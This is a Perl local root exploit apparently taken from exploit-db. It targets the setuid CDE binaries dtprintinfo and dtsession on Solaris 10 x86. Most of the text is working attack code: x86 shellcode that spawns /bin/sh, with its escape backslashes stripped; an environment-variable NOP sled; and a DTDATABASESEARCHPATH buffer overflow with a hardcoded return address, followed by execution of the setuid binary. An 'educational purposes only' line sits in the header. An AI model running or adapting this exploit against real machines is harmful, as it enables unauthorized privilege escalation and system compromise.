https://www.exploit-db.com/exploits/1248

漏洞细节尚未披露

#!/usr/bin/perl 
#######################################################################
#
# Solaris 10 DtPrintinfo/Session Exploit (x86)
#
# EDUCATIONAL purposes only.... :-)
#
# by Charles Stevenson (core) <[email protected]>
#
# greetz to raptor for sharing this vulnerability and in no specific
# order just want to show love for: nemo, andrewg, jduck, bannedit,
# runixd, charbuff, sloth, ktha, KF, akt0r, MRX, salvia, etc.
#
# irc.pulltheplug.org (#social)
# 0dd: much <3 & respect
# 
# 10/12/05 - FF local root
#
#######################################################################
#               PRIVATE - DO NOT DISTRIBUTE - PRIVATE                 #
#######################################################################

#You can try lots of dt* suids.  I'm too lazy to code the loop ;-o
$dtsuid = "dtprintinfo";
#$dtsuid = "dtsession";

$sc = "x90" x (511-108) .

# anathema <[email protected]>
"xebx0ax9ax01x02x03x5cx07x04".
"xc3xebx05xe8xf9xffxffxffx5e".
"x29xc0x88x46xf7x89x46xf2x50".
"xb0x8dxe8xe0xffxffxffx29xc0".
"x50xb0x17xe8xd6xffxffxffxeb".
"x1fx5ex8dx1ex89x5ex0bx29xc0".
"x88x46x19x89x46x14x89x46x0f".
"x89x46x07xb0x3bx8dx4ex0bx51".
"x51x53x50xebx18xe8xdcxffxff".
"xffx2fx62x69x6ex2fx73x68x01".
"x01x01x01x02x02x02x02x03x03".
"x03x03x9ax04x04x04x04x07x04";

print "nn$dtsuid root exploitn";
print "----------------------------------------------n";
print "Written by Charles Stevenson <[email protected]>nn";

# Clear out the environment. 
foreach $key (keys %ENV) { delete $ENV{$key}; } 

# Setup simple env so ret is easier to guess
$ENV{"HELLCODE"} = "$sc"; 
$ENV{"TERM"} = "xterm"; 
$ENV{"DISPLAY"} = "127.0.0.1:0";
$ENV{"PATH"} = "/usr/dt/bin:/bin:/sbin:/usr/sbin:/usr/bin";

# Create the payload...
#$ENV{"DTDATABASESEARCHPATH"} = "////" . "ABCD"x360; # raptor
$ENV{"DTDATABASESEARCHPATH"} = "////" . pack("l",0x8047890)x360;


# If you don't get root try other dt setuid binaries
print "Trying to own $dtsuid...n";
system("/usr/dt/bin/$dtsuid"); 

# EOF

# milw0rm.com [2005-10-12]